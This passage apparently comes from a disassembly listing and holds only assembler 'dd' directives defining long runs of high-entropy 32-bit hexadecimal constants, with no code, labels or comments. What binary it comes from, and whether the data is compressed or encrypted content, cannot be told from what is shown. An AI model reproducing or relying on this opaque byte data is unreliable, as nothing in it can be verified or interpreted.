		dd 6327E9D4h, 0FCE35FCCh, 7A5ADA63h, 0D69F712Bh, 0D2A430AEh
		dd 9792912Ah, 0E860396Bh, 33F2AF4h, 0BB2B503Dh,	84114741h
		dd 0E96113A9h, 1B997FE5h, 0B0CC96ECh, 5E86E07Dh, 0CB218E39h
		dd 3A33C967h, 0AF427F5Ch, 20194103h, 73A8CAAEh,	32B8CC7h
		dd 0E5805CB6h, 30644A84h, 907BE1E8h, 7CAB5D7Ah,	1A1FFD29h
		dd 7104EB3Dh, 93858CFBh, 7FEC0ED7h, 0B7BFEF1h, 4F484C44h
		dd 72877AC6h, 0F2CBF419h, 0F021ABA2h, 460D59C8h, 0F665C1F5h
		dd 0F5F16067h, 0C8220216h, 718BE8BEh, 66DFAE0Ah, 0B9E147BBh
		dd 0BBB3EA6Ch, 0B96AA13Dh, 707D26DBh, 0CBB9E566h, 0E9F3B17Ch
		dd 5F4BD1D8h, 0FC06F8E4h, 0A73F8E04h, 6CC7FF6Fh, 0E1F44B43h
		dd 0FD98C33Dh, 5ABCC7B7h, 21E68E25h, 0C6ED4E0Fh, 0C6682698h
		dd 8A5B18BCh, 92E2D4B3h, 0F50C498Dh, 14D4702Ch,	67A3DC8Bh
		dd 3E791DFEh, 1E146AE2h, 5EC2F358h, 0A655D701h,	0AB47BE8Eh
		dd 0BCC3717Eh, 386F2780h, 0AE93A6E3h, 604FC1E8h, 5E68BF1h
		dd 0C3DBFC44h, 0FC71B2FDh, 0FE56B959h, 9346ADA5h, 0D5DE6F2Eh
		dd 0E2ADAB34h, 0AA9BE923h, 0A1529BCCh, 6D2F4517h, 0D3E82F7Bh
		dd 82FCC097h, 1FB5EBD6h, 0E1B39BD4h, 0F403562Fh, 0D429423Ch
		dd 9964D465h, 5917D2A5h, 0F2E51CC7h, 886AC5B6h,	2A4BA7F6h
		dd 7EBCAA86h, 3AB7EDFFh, 0F20ED5Ah, 0AABB38BCh,	9224AC87h
		dd 0FA452BA5h, 0BD50C7A8h, 22AE6557h, 0F28C5582h, 27CBD141h
		dd 6DE36094h, 0E7D63F67h, 5B5F2FC7h, 14C74B58h,	3CF59D99h
		dd 0FE7B46F8h, 0D38CCF42h, 0F21E1553h, 62D5DD57h, 0D4B5266Bh
		dd 4BB69A7Ch, 7A40405Dh, 0A32AC7B1h, 6756E4D8h,	0F6B1AF5Dh
		dd 57C35DFEh, 0F7E3F0CFh, 0B51A9EE9h, 0B695CEACh, 0EB4DB74h
		dd 6FA25742h, 0C14A5574h, 7AB3068Ah, 55827AFBh,	4F612867h
		dd 5F0146EAh, 683AF84Ah, 0CA86FB94h, 0F89EECB4h, 0C02DF44Dh
		dd 34EA82Ah, 2448C6E2h,	56BE9DEh, 1FEA1D9Ch, 0AE8AB6D5h
		dd 4CDADE94h, 72AEB210h, 0FB3FCE3Ah, 7E14915Ch,	3CD3E645h
		dd 31CC8988h, 22E024BCh, 0CCEC5DE8h, 244EF1E3h,	9D914BFh
		dd 0A94AD6C7h, 86DDB769h
		dd 0A52E7FCDh, 6E132AE2h, 0DF602CA4h, 974AE9D5h, 825C5647h
		dd 48BCCBA5h, 0CB995449h, 0D78B3F07h, 0C814344Eh, 5BD8D856h
		dd 0E8320E6Ch, 780415ADh, 0B3B4FE73h, 3E58EB4Fh, 0ADBC7CBBh
		dd 21E8E38Fh, 0BB7D2ACDh, 0D9D1FF4Bh, 3E1C88F5h, 24EA2A20h
		dd 0AD3B4E2Eh, 546294ACh, 284BA7B9h, 875CCBAEh,	0B526EC7Fh
		dd 0CACA1F2Fh, 63B111FEh, 0FC6CD7D8h, 924FE77h,	410A79E8h
		dd 3704F1E6h, 19796175h, 0A0AFD0D8h, 0BD924ED5h, 5BC75360h
		dd 4914D18Fh, 1E9F5345h, 0B86792D3h, 0F2861ACCh, 5405DD29h
		dd 0A8C96DE8h, 0F6289954h, 0FE2B3237h, 8781731Ch, 69BCC44Fh
		dd 7F5CF1EFh, 3EC87881h, 2BF2D2D7h, 0EBCC173Fh,	76EA70B1h
		dd 5097B41h, 0B3BAEA58h, 68756910h, 0DE3DC292h,	33BC168Eh
		dd 53A04EC9h, 0DBA007D0h, 76659027h, 0A898E5D3h, 0DA95CDA5h
		dd 0DEC06670h, 742A5D39h, 16A9FC2Fh, 0DB829FCBh, 0EE480ED7h
		dd 4462FB76h, 128A7709h, 0AAF577A8h, 0A31F013Ah, 0F1FBAF6Bh
		dd 0EEF73ECCh, 0B61B77EDh, 0BDAFE400h, 5AB7CAC2h, 0F1E5339h
		dd 78B918D3h, 0AFB3EFA7h, 5763D8DDh, 0F0A173D4h, 4FC06058h
		dd 0D4413D67h, 0D4B4BA65h, 23EFBB6Bh, 0BC7F78EAh, 0EEFEA7D1h
		dd 0F76310EDh, 1622505Fh, 0FC769BDBh, 6FEAA05h,	0F3FB3055h
		dd 93DB52FBh, 59BDF4D5h, 0CE92B73Fh, 8763596Eh,	0F1EB5299h
		dd 3B340E91h, 711DA128h, 9CF0A144h, 7C1F004h, 0C6A3EA8Eh
		dd 9DFE35E5h, 397FEC6Bh, 0B3ABB9ACh, 0BB91C45Ah, 0B6EE7868h
		dd 0CF22C16Ch, 8282031Fh, 0EF380F08h, 0F64F034Fh, 0ED5AB99Eh
		dd 7E39B4A2h, 0D1E17823h, 3132ED06h, 0FE4457E5h, 0FBFF3987h
		dd 7ED0D437h, 8A8A0554h, 7FC4B38Ch, 5AA27189h, 17F2EA78h
		dd 0F9260C6Ch, 9F4C89C7h, 284B3D0Fh, 0A319CED1h, 0E1747549h
		dd 42E3F2AFh, 4F3BCB3Dh, 0AFFB309Ah, 32E511A6h,	0E775E56Eh
		dd 0AC3DE21h, 0CCE09627h, 1EE98FE2h, 0FD68954Dh, 897D53F0h
		dd 0D86C9B39h, 2F9288B2h, 0F6636B95h, 8FBCFA31h, 9A1682FFh
		dd 0EA291B97h, 0C3562946h, 0A4215F5Fh, 0ABC8DA65h, 92FEF9F6h
		dd 5AD5B376h, 8278EF24h, 0D9FDFA04h, 6FD2EFE7h,	0DC3AB0FCh
		dd 0A2F7B64Eh, 0A5A4AB1Dh, 333DB262h, 64150702h, 0CBFF82E4h
		dd 52770014h, 20C4D98Ah, 0C639DE60h, 0E8774546h, 5E535662h
		dd 0ED598F61h, 0ABAC52A9h, 0A3531CA4h, 0C1B5DAA5h, 0EEDA4066h
		dd 0D24BD9B5h, 32A2398h, 7C5DD57Ch, 0B4FABCAEh,	0DD245994h
		dd 766DEA89h, 0B029C2C5h, 79E7CC62h, 2529FA86h,	0BE1FEC69h
		dd 73B94A67h, 0E2BBD674h, 6D5D81E1h, 0A07FE637h, 0E25FB5CBh
		dd 0F371D1E5h, 93FB330Eh, 0B50B84AEh, 0E29A471Eh, 0E555B4ADh
		dd 24A0FE4h, 0FD9AC588h, 0A798D623h, 0D4D46718h, 0D9A3B950h
		dd 0EBED7308h, 0AB976BCh, 0FEF4F626h, 0DE69B8DDh, 83EE9056h
		dd 0E84E94AFh, 71A5C0Fh, 0E93669F4h, 0D6BD1F1h,	2E690E9Fh
		dd 676A2A05h, 0AB9D45BCh, 4F5416A3h, 0D19AE32Eh, 8930D37Ah
		dd 0E4D03A6Bh, 0D159A7B3h, 0F0CD3F7Ah, 3DBDAC46h, 0EBDF0E60h
		dd 0BAEC7723h, 12557E54h, 0A6A3C074h, 14E98E40h, 7657A3CDh
		dd 0DCDC1CCDh, 7A7C92EDh, 1F99544Ch, 89C3F3DEh,	0AA48A211h
		dd 0B0EEE892h, 8760811h, 0C729C2EEh, 0F776B224h, 9F3C82C5h
		dd 0A6E28C41h, 0CC77A4A6h, 31A8DCD8h, 14ADF87h,	525EC095h
		dd 0C5A48DC0h, 0CA996CB6h, 0AABA2CECh, 7BC44829h, 5A197195h
		dd 0F03EAEB5h, 9E5BF462h, 24913CCFh, 9F7EB12Ah,	0B6B86FA6h
		dd 0CC4CC8A1h, 0DB595672h, 5E949D99h, 0F2DB2991h, 0BBEFEEFAh
		dd 2ABD416Bh, 9E92EFAEh, 234525D5h, 0C476B801h,	65CF4415h
		dd 902CF506h, 0AAC47584h, 8BDDF9D8h, 48C83F13h,	61B8AE0Eh
		dd 6BD225Ch, 0B4941F34h, 3BDC72CAh, 6D905F35h, 97132BDEh
		dd 31E18848h, 0EFB1CA31h, 2F079DF3h, 3452373Dh,	9E2E8F0Ch
		dd 0BEF9F2h, 0AB735CE6h, 6FA0F66Eh, 79FF40EDh, 87DFB0FCh
		dd 0EE18E31Eh, 0BF768309h, 7D2D7BBCh, 0DC6DC5CEh, 0B08D1815h
		dd 9A8D526Fh, 41D1BC7Ch, 0ED76A296h, 0D7F9D3F2h, 0AA0F614Dh
		dd 2773DBBBh, 0E7DAFCE1h, 972B7B81h, 7104FAB6h,	5D35731Fh
		dd 30BA4568h, 556E14C7h, 0D895CB8Bh, 90C26090h,	32DD485h
		dd 0DF0CCCFAh, 8EDAF56h, 6A7BD5D9h, 542B2291h, 0E57182DEh
		dd 21FEBECh, 7A21DFBDh,	0F1A888A8h, 598024E3h, 0AFC383ECh
		dd 0A31E91A4h, 0D46D599Ah, 0ABF0044Bh, 0D184BA9Eh, 0DFAB5549h
		dd 0C4DB1C94h, 0F3970B2Fh, 2DF744C9h, 4E25F15Bh, 0D9566833h
		dd 0D4E64E03h, 65092DEBh, 541307CEh, 5849326Ch,	707CE813h
		dd 35A069Bh, 122F1E5h, 238E02C9h, 89D4F34Eh, 0A29A16B6h
		dd 5648A340h, 0EA7039BEh, 0EFC43290h, 89457557h, 7DE17150h
		dd 151C65C8h, 2967F5ADh, 7841B52h, 0D289C0AAh, 0F28007B4h
		dd 44810598h, 0BFDB54D9h, 2FDA769Eh, 0B00CB25Eh, 6EC19F22h
		dd 3A957ADDh, 0DA873050h, 67184647h, 85D398F3h,	0D577806Dh
		dd 0A62A03C8h, 130FE133h, 3F084814h, 459B4069h,	9A6EDE9Dh
		dd 4BA60E79h, 8DC23A7Fh, 5E65F2F1h, 38E5D155h, 0AF1B14B9h
		dd 963DB57Ah, 4A15F5ABh, 773A83E0h, 0BE2E364Ah,	852B7B3Dh
		dd 0F5D23651h, 0D61AEE8Dh, 368BE05Dh, 5AA0AE0Eh, 7DFEDCA8h
		dd 4D51968Ah, 0E18ECEDh, 64AFF917h, 0CBD8D5h, 0E63AAEDFh
		dd 3C31494Ch, 0DAE79919h, 7F50FC1h, 91754A75h, 33892C04h
		dd 6A5923D2h, 7ADFDB7Dh, 0D0B4CB46h, 508F74F4h,	0AB39F095h
		dd 44E10E6Dh, 0B3DF55CCh, 9F8E58AFh, 59724178h,	0DA55EC6Ah
		dd 5ABAF63Ch, 342AEEC5h, 7F0DBA16h, 5C878955h, 0C6528405h
		dd 3525957Ch, 0E760DFEAh, 75A9ADAAh, 0FF3914C1h, 0EBF5702h
		dd 1A59FCD3h, 0D2B54FE7h, 127C0FC5h, 0AF664A8Ch, 0F95C657Bh
		dd 9429774Fh, 0B8BEB7EFh, 446A9E33h, 0BD85DB3Ah, 12D1059Eh
		dd 0A37AA61Bh, 674BF168h, 0DF4EA2BFh, 8E7AB8ECh, 0ED9EEBD0h
		dd 0F40B3104h, 834056Ah, 8A50434Dh, 91AC7E08h, 278E2CC3h
		dd 9AFDE6EDh, 2C507F44h, 7E3A4F9Bh, 5EBDD358h, 506BAF9Fh
		dd 72AED952h, 1D997892h, 767EB2DEh, 9D778C92h, 0BCB258Ah
		dd 673957A5h, 0F1226277h, 0DB2B288Ch, 0BAFFB8A4h, 6FECA18Eh
		dd 0F89D65EEh, 65FEEAF2h, 0D5D2C5Fh, 1A15D910h,	7F8CF05Bh
		dd 1E3A3E2Eh, 0B8630B3Bh, 0B8E2972Dh, 0C0F52C1h, 0D2DE5A4Bh
		dd 0ED568AA8h, 0E98B5EC8h, 2A48342Eh, 0E01898B2h, 5D09A933h
		dd 79E703A6h, 778FD4BCh, 1B59FE66h, 2B18FF9h, 9C475459h
		dd 4263FC2Ch, 2AF12BAh,	6884E794h, 446B57CFh, 377373E2h
		dd 9FB6CAA7h, 92AAA59Eh, 4B9D02C9h, 0EB955C33h,	3478D549h
		dd 4848A6FAh, 36920D3Dh, 48CEE4F9h, 3497F22Dh, 89F4C3F1h
		dd 0B6D4E6D8h, 37671F15h, 17F26D38h, 0FAA27DAh,	0A39C71E8h
		dd 0DBA91C36h, 4EC0D2CDh, 0B7C364BAh, 0E9001541h, 71B3F053h
		dd 0FA0222F1h, 88564A7Ah, 6A56D5A3h, 0C9CAF5E5h, 0F886CCD6h
		dd 0B14F8EEh, 0D167506Ah, 0D6EBA663h, 77EC3722h, 5CEFC891h
		dd 623697BEh, 8B101DEAh, 7F659D6Eh, 1DB72DEAh, 9F2B125Bh
		dd 0D5723678h, 9CD90262h, 0C3CE9EBAh, 4035F4C4h, 0C582E15Dh
		dd 247E2E7Dh, 0B8F4A00Fh, 0EE5452FFh, 0A6FB5280h, 0A1C2C6EBh
		dd 0CA2E4312h, 0CB0D48EFh, 4EC86991h, 0B8CF2636h, 0D1B67353h
		dd 0B810A88Fh, 77C65C11h, 24E91835h, 0B9488D5Ah, 210C6CDCh
		dd 0A300205Dh, 32A4CC35h, 0E67CC8C1h, 0C49C4A6Ch, 7657AFE4h
		dd 4C089B1Eh, 0E1A7C35Ch
		dd 0FA2EB607h, 44AC8ECBh, 2A0ABCC7h, 30E55936h,	95E28D68h
		dd 0A70C2ACAh, 86ACF206h, 0DDFABE4Eh, 4BB7E2D7h, 5357FD4Ch
		dd 8051EADFh, 77D70D8Bh, 0E847DD91h, 66C4C9CCh,	8BFDD710h
		dd 764A9A06h, 0A4F6377Bh, 2FF651BBh, 0DC71D2BFh, 21C3474Ah
		dd 241AAC87h, 0AB67F85Ch, 0DE270D47h, 0D5992D17h, 0E3958F10h
		dd 3FF507B6h, 0F0EC902Bh, 7DF562ACh, 0D3AB51A5h, 5E30FCE6h
		dd 4A342E1h, 0B5493D8Bh, 15D04F4h, 63A62DC1h, 1665A423h
		dd 577371BEh, 4126C75Eh, 63B966C8h, 0A3384E9Bh,	6A0CE0F0h
		dd 7F2E129Bh, 0AF6475DBh, 5C7156FCh, 761D0C09h,	0B7C28F00h
		dd 1FDEA7E8h, 0E6B20E08h, 484B5D6Bh, 485A76DEh,	8359AF56h
		dd 397B02C8h, 3CDBB722h, 0FDC6A4B1h, 39F2EA9Ah,	552FF2D2h
		dd 4B58E274h, 72EA9A51h, 2DE8E265h, 26553420h, 8E0E5F31h
		dd 160523CAh, 5F1F33EBh, 0E70A9202h, 0C203D7AFh, 0D24D4B84h
		dd 31FF6946h, 0B5F6D722h, 5E043986h, 46276346h,	0CC480BD7h
		dd 0E45F6556h, 894FA467h, 73B4C1DEh, 0B9EA3C29h, 35122189h
		dd 0A43B3CDEh, 9F86D190h, 1B94F130h, 58A2CE2Fh,	0DF437D06h
		dd 0A7F2BE52h, 316868ECh, 32A901EEh, 4756C6EEh,	79D25355h
		dd 0FB47E5BCh, 0E25B1C6Bh, 2366293Ah, 11DCBACh,	0EFF5B140h
		dd 0B4F7F88Eh, 6EB6758Ah, 0B9FB8E91h, 0D2460788h, 502E5685h
		dd 82FA31B8h, 2AC265CCh, 55A3FCF7h, 327DABC1h, 30D9871Fh
		dd 0CA0D4E81h, 0E6AB065Eh, 7D7C4589h, 0C5BF76B1h, 117D0B42h
		dd 38753CA7h, 0DB102527h, 243C3974h, 379DFD72h,	0BE58DBAFh
		dd 55A65674h, 55400B79h, 3EE53E99h, 0C529F93Ah,	0AE12A5C4h
		dd 9AC53216h, 119F37D6h, 0EFF63771h, 5A57729Bh,	990F0AAFh
		dd 3EB2703Fh, 6BB43430h, 766999B2h, 0FA6E168Bh,	3BA99AA6h
		dd 775B712h, 88AED93Bh,	4BD9D3C2h, 0B98F7CBCh, 0A01B5B81h
		dd 4F53588Eh, 0F67F2BB1h, 7767EC90h, 5FE6CFCBh,	76012F87h
		dd 0D620E295h, 191C197Eh, 0BC19799Fh, 0D2FD6F22h, 0D55A9A07h
		dd 69E137B0h, 40DC58Ah,	0B704F8BEh, 0ED17BC61h,	5246FE67h
		dd 0C5465B65h, 2FE8EA3Eh, 8A4E6140h, 9D129CD9h,	251921F8h
		dd 0AA6ABDFCh, 4F3ED1FCh, 393BB306h, 63B4D337h,	125C7322h
		dd 6A203004h, 47CBD7BAh, 5FCE95BBh, 0A8FEDC4h, 614B9427h
		dd 4DB7B112h, 0AA302F1Fh, 0DAFD5253h, 43F0499Bh, 0CB825DE8h
		dd 0B44C182Ah, 228AB9CAh, 2596369Ch, 0C9BFADA7h, 0E28ABF6Ch
		dd 0ED8619B7h, 3AA97B30h, 0C2EF527Fh, 1CE57DA7h, 398C5E0Eh
		dd 5BB7A203h, 0EA5D3D7Dh, 0FB717E88h, 0B3E68A07h, 2C06D6B6h
		dd 7156408h, 0F57F8479h, 0AC43DBB0h, 38B7BA8h, 1C2A994Fh
		dd 0ED78EB5Eh, 1AAC4946h, 0FDFF2DE8h, 0DC5CA251h, 1599630Bh
		dd 6E75F52Ah, 6AEB8B43h, 6D5479E1h, 0CF14AE59h,	0BD3E62Fh
		dd 455D0C95h, 17126F08h, 0DED1B8FBh, 0C1AEA93Ch, 3C254260h
		dd 0DE9CA6A2h, 0A3D991B5h, 292C2B46h, 0DFEE89D6h, 51C996CBh
		dd 285FEAC4h, 0DF6B3D21h, 1A31C724h, 0CDC6972Dh, 73993102h
		dd 359FE7E1h, 0D5FCBA27h, 408C9DCBh, 21F3E69Ch,	26BBF2F6h
		dd 933BB5B2h, 87E37717h, 1DEC75C7h, 0AAD96F05h,	2C2B6C2Dh
		dd 8E4DF8D6h, 0AE0F0BE6h, 26A97639h, 0C7AD25D8h, 139F249Dh
		dd 0C5EA9D04h, 522AC1D9h, 274A3683h, 3EA96E60h,	0BF6ED9B0h
		dd 8E1EE4B7h, 55790B49h, 199B3301h, 7B7D6017h, 691F459Ch
		dd 7D7A2DB9h, 91250790h, 7A141561h, 65E9ACCDh, 6599A37Bh
		dd 16CA75EDh, 57233A17h, 4D9FD44h, 568BBBB9h, 0F864F1D5h
		dd 0F5D65B2Fh, 7AAE45BEh, 3ACF5C4Ah, 91FCDDADh,	0D1F9B4CDh
		dd 6D4A854Eh, 58CBACD4h, 85BA488h, 0F47766Bh, 0D08CFD31h
		dd 8FF08330h, 9F6B73D7h, 544AD555h, 0BB2D2E65h,	8764D4Eh
		dd 1247BB12h, 0F1EDE589h, 6654D9FBh, 0F506112Fh, 242A1A68h
		dd 6B0B260Fh, 44939BFh,	869C2D1Eh, 9E55A70Ah, 37587165h
		dd 8F56D0B0h, 0B18467Ch, 0B241DF2Dh, 0B1BE0F16h, 0D32938AEh
		dd 6E373B7h, 0BB447B4Fh, 1E295ACBh, 5F9A6C58h, 0C12E1F7Fh
		dd 0F786BA0Dh, 31F4B708h, 879A156Ch, 1B3EE092h,	658D284Fh
		dd 5FB222ACh, 3EB26CDAh, 4BF5B2A0h, 4282D78Bh, 0D602E162h
		dd 31D66E34h, 63699BE7h, 887E2952h, 2C42A7DFh, 0C3BA32B3h
		dd 577437FBh, 0D29C03B5h, 468FA894h, 8E041A1Dh,	0A9F4F2DFh
		dd 0BBAF1F36h, 0EE986D0h, 0FBF06EA9h, 90E08166h, 2C698DB1h
		dd 764A781Fh, 2BE6335h,	651FCB85h, 918EF1DFh, 0DFEB2142h
		dd 674C95EBh, 60ED68Ah,	31332E0Dh, 7F112F8h, 1E782D06h
		dd 0D1731BB5h, 0F4BAF2A2h, 836F9D2Ah, 1F2C58E0h, 20BCB81Ch
		dd 6D281819h, 9383FF3Dh, 56BA8681h, 1DF355C6h, 66722B56h
		dd 7C6398A0h, 76261CF7h, 54E52F86h, 0F835DF0Dh,	0D10E43F0h
		dd 0FEE78122h, 552FFB74h, 9F1830D9h, 722860E5h,	50B7DD72h
		dd 0D23AE6ECh, 0C5C97668h, 0EA6C4B1h, 0E9CDD7B6h, 688EA2D7h
		dd 5ADA42ADh, 9D8F57F0h, 793CF607h, 0D6BD90D6h,	9F2E1E32h
		dd 530B4ED6h, 7A7BA5BAh, 0C555FE67h, 0E1F8CBCEh, 9C8BB157h
		dd 67B28DCCh, 0FC28B365h, 98E9D2B2h, 67493702h,	0FC1A4F51h
		dd 413588E3h, 832F1369h, 3A4B6CFCh, 0B923913Ah,	0AEDFB637h
		dd 0CE1F72BFh, 0B1AA67FBh, 15DBB0BAh, 5A4FCD85h, 4EBD3EC6h
		dd 0EAC944F3h, 806815Eh, 6E652CD7h, 1BB937FFh, 4B9C28BFh
		dd 0A51E40FFh, 0C4C1226Fh, 9B07936Fh, 549F965Eh, 2CF8063h
		dd 0B597CB54h, 89A6411Ch, 0D528BAC6h, 0D9723EDh, 0D1991D9Fh
		dd 0DFFB132Ch, 945B44FBh, 0DCAA4C67h, 5327BC92h, 8E0E832Eh
		dd 0EBB3181Fh, 0ACF2157Fh, 4024E450h, 0CBA6CABBh, 361161Fh
		dd 0B3FD0185h, 325F82FDh, 0E11F3FC0h, 0ADBA3EECh, 198EC54Bh
		dd 0C23A5145h, 0C0A13981h, 9EBA8A29h, 15FA6C37h, 2C07B282h
		dd 151A98BAh, 573D0791h, 0DCB1CBAFh, 0CD3D7817h, 607C2C3Bh
		dd 714CECB8h, 6C49DB53h, 7D0BC2FAh, 5156FBCEh, 19DAFDB5h
		dd 28105FC8h, 0DA3F285h, 0A69B3C2Bh, 235F4335h,	0DD267A5Ch
		dd 0C62728Eh, 2A0F55B3h, 0BD681A78h, 0F530ED21h, 0C2FF84D2h
		dd 67DCE52Fh, 162F6E9Dh, 3FC3B56Fh, 0F53AD953h,	0D8C9FD5Dh
		dd 558E871Ah, 5B18F57Ch, 0FB344AECh, 723E4AE2h,	907A9395h
		dd 0EE32E46Bh, 162A38B3h, 234CEB58h, 0FEA1F82h,	0F1A45558h
		dd 0A17C9DA2h, 2A9767D1h, 0C6590C0Fh, 1FCA87F6h, 322527ADh
		dd 0A155CBECh, 1B6C4155h, 59233B81h, 0FE48ADE6h, 0AD782FF9h
		dd 4568E92h, 0C94CE66Eh, 231FD74Ah, 607E6F80h, 0FFD23EC5h
		dd 96587FD5h, 7731B2F6h, 0A33D8E14h, 0F18AD619h, 8DD26DAAh
		dd 0A8B8873Fh, 1869F929h, 0DB7AD349h, 86CC7DA9h, 0CB3089C9h
		dd 1FA089FAh, 0E4E5E5C7h, 0E8C0F217h, 0C4E17E9Bh, 0FD9DAE98h
		dd 0F0DAC5E7h, 5DE3CB43h, 0E3CACD3Bh, 635D87Dh,	898CAAF8h
		dd 0FD07257Ch, 0B0591A8Bh, 0F33BBF3Bh, 5C815A23h, 22746CDDh
		dd 452DD043h, 0F169FDEh, 0BA19B7BBh, 50CF3DE2h,	52F42738h
		dd 0D8DF4C00h, 26466B19h, 7443626h, 31D87AAFh, 5EFA33F9h
		dd 7B8517FCh, 56B8D03Ch, 5FEE6C5Ah, 44BDD258h, 568EE323h
		dd 3774452Ah, 20A5C6B3h, 351E7089h, 7B1A7A2Dh, 9AFBA2D1h
		dd 0A9D4F890h, 666D1329h, 0F36082AEh, 10BB17E0h, 0E6BB4D16h
		dd 7CD63D63h, 0AA2A1C65h, 2E3248Ah, 0D8FD550Eh,	4F35369Dh
		dd 6587E49Bh, 74B686EBh, 1368B44Eh, 0E870941Ah,	99D12D08h
		dd 667B7C0Dh, 25479BC0h
		dd 4BB6BB1Fh, 30B3788Bh, 0AFFCFE30h, 0C9E4520h,	9ADCDDB7h
		dd 478DEA33h, 5F417C94h, 4D573D25h, 1F45A4ECh, 0DCE8403Dh
		dd 0DAAE1562h, 0FC577E13h, 1720CA85h, 4D87E7B7h, 8EF5378Eh
		dd 0BD7CF253h, 6A05BFF0h, 79A92A10h, 44FD2951h,	4ED6383Eh
		dd 0AFAA509Eh, 0C0B2097Ch, 2635352Bh, 39B89872h, 0C397F9FCh
		dd 0D92BF98Eh, 3F0A53D2h, 95AD9875h, 0F8F217C6h, 46ECB25Ch
		dd 6B52DECBh, 55136473h, 22650717h, 0E94A8BB2h,	0FD5F8BD0h
		dd 0D51F75D6h, 5EA91DE9h, 0EF6AECFFh, 521AFB8Ah, 0BC6FE5D3h
		dd 8B2EE983h, 5CD5902Ch, 0A89B8957h, 0B37CB68h,	0F0EA75BEh
		dd 0ECD7CEADh, 25110FA8h, 0CA0CFA13h, 4C7AC67Fh, 7D2522F3h
		dd 114717AAh, 76355CE9h, 0C5240DB9h, 55DD55BDh,	0A952742Bh
		dd 5F3C5B72h, 5410457Eh, 34C0B078h, 73DD5229h, 0BFFAFDBCh
		dd 0E050DD84h, 0A30BF1EEh, 74431B10h, 7B3FCAF1h, 264B83E6h
		dd 0EDFBA65Eh, 0C4AF8883h, 17CCA1ABh, 4D1F9057h, 6E93CA28h
		dd 0CF5A0C85h, 54C4645Fh, 1886ED77h, 0CCBB9A8Bh, 4D7BF26Ah
		dd 0FC1E998Fh, 6F36B46Fh, 33E6BCB5h, 0A913EEAAh, 0E4769FB2h
		dd 4A62DB0Ch, 0BFDE2EC5h, 0DDB83DD2h, 94B9E269h, 50E51368h
		dd 0C1B8566Bh, 8FE8ADAAh, 10633345h, 371A5DD8h,	0A42818C3h
		dd 8ABC7BACh, 9AD6BD37h, 410786A0h, 0EC4B384Eh,	1CBDDD51h
		dd 15582E34h, 0DCE01AC0h, 79BB3515h, 52D9D7AAh,	760647C7h
		dd 98A44271h, 6CE0EAD0h, 7CC21160h, 3FDF5DB4h, 18C6FE3Ch
		dd 2B35AAAFh, 7D374AFBh, 0DBC268D7h, 34FB3D39h,	2E49A5F3h
		dd 554E9C23h, 71AF46E1h, 0DC7B99Bh, 27748A50h, 2FD296DAh
		dd 3966D7FCh, 6EAD48C4h, 0CCD6B7AFh, 0C6F3BC02h, 63398D91h
		dd 0FB664B8Eh, 15733325h, 91C54C7Eh, 0BB08FDA4h, 9F607D29h
		dd 0BAE9ABB3h, 5064551Bh, 12160955h, 52A29ED4h,	2FBEA365h
		dd 71C9981Eh, 8C3CD142h, 9245BAB0h, 0BBFFA597h,	146CD116h
		dd 705FB5A2h, 3DB8C6A5h, 7A794871h, 6FBB1FCCh, 59EA158h
		dd 0B0B65465h, 0BF5F708Dh, 35668DC4h, 52FFBB5Bh, 0E82578Eh
		dd 13AD4109h, 845F607Dh, 8EEAE58Ah, 0D71391A2h,	6292FA2Ch
		dd 74126F37h, 7A79C687h, 19D879DEh, 0E93D477Fh,	3ECF9D47h
		dd 0A50B6289h, 616643D1h, 0AAA80B3Fh, 0F7EFF0DCh, 7B2B0CA4h
		dd 0F61A81E0h, 0C6213405h, 0E9D51BDAh, 0ACDA6834h, 0D99737BBh
		dd 0C864F4A7h, 57AD4E42h, 0DB96A01Fh, 677EA36Bh, 42CB028Dh
		dd 0E9AC912Bh, 0DF453363h, 0C4CC6797h, 0DA8778DCh, 28A3797Ah
		dd 0A75B4289h, 0C3813E03h, 9438DCEFh, 0C30EEFB6h, 6EC8895Fh
		dd 38A5E6B2h, 0DEC52B62h, 4C3C64AAh, 0F3930FC0h, 64BB8B88h
		dd 3AA12E9h, 7FA62A74h,	108C4A09h, 44FCD5EDh, 394FB717h
		dd 5F8F2C9Fh, 155E5B30h, 669B66DEh, 0B477482Eh,	10ED8755h
		dd 0AC4094E5h, 0F5EB3E74h, 50D2A728h, 1EA16585h, 0DCD74544h
		dd 8DD5F355h, 0F4538990h, 0B60E238Dh, 0B38DDA7h, 0A6EE84EEh
		dd 6DC35FCCh, 49E43F3Bh, 0EFD6741Dh, 0D22D1C26h, 0C3F1B69Ch
		dd 4B5C33E5h, 1781153Ch, 1DCFC70Ah, 68B1F6D5h, 0B4E688C7h
		dd 93C66C95h, 87CB8368h, 472A3757h, 0FC182482h,	2A9ABA12h
		dd 0E8CD81DAh, 0B45EE4Ah, 0ECACCAD9h, 9F34DB13h, 4C733D3Bh
		dd 0DE886253h, 0E5E0F898h, 0A346A6AEh, 0C0AB76F7h, 59716CE1h
		dd 5593A003h, 6D2910FCh, 23F50ADBh, 0DB3580DEh,	8EB27160h
		dd 22E09C9Bh, 787DAC5Bh, 463B419Fh, 0A9AE42D0h,	23DDB9ABh
		dd 0C238CDFEh, 0B2BFE1EEh, 5736B874h, 628C52B4h, 0F9E5D0EAh
		dd 0AAF56967h, 4C559796h, 0EDE9C76Eh, 0BE8D83B4h, 0EC80B03Fh
		dd 1C1E464Eh, 242F5F33h, 6C494418h, 9F3C510Eh, 0AF035F6Dh
		dd 114618F8h, 286C84D2h, 29ACDC5Eh, 0C8F94B95h,	0CDBE0B6Ah
		dd 0D9845125h, 262A3491h, 284AD05h, 0DEEE5FC9h,	0DD450A84h
		dd 333B89FEh, 0EF47590Bh, 0FF3EC677h, 9A8F2CFEh, 8B651910h
		dd 4BED4BB5h, 5B4581B1h, 0E90C89DCh, 0DE021308h, 76D63518h
		dd 0DD6035A7h, 390940A4h, 61EBB643h, 0DF13F8F0h, 50602BF6h
		dd 0DE5D0655h, 5EAC4631h, 621F4954h, 0C1579312h, 50738FF7h
		dd 698FBCD4h, 68EC331Fh, 20390AA3h, 377E0B45h, 787276D7h
		dd 4AD5391Ch, 0A12FB60Dh, 731EA3EBh, 0E189DCAAh, 9D07CD89h
		dd 50A89AAEh, 70D0A7AFh, 0A82C59B7h, 1A247251h,	33F1FE34h
		dd 0B77EFF26h, 256BF4A5h, 0A156B9FAh, 0C0FCFCC4h, 7F1B6CA0h
		dd 50FFA2D4h, 0AE668965h, 7D2761FEh, 5C08B481h,	0DFACFEB9h
		dd 55F0A63Bh, 0FC27F163h, 0C2AB3E6Dh, 0D25C35DCh, 72B010F4h
		dd 0A96CEF77h, 0F5936173h, 0B1BDA835h, 8BC762D1h, 0EDE0E332h
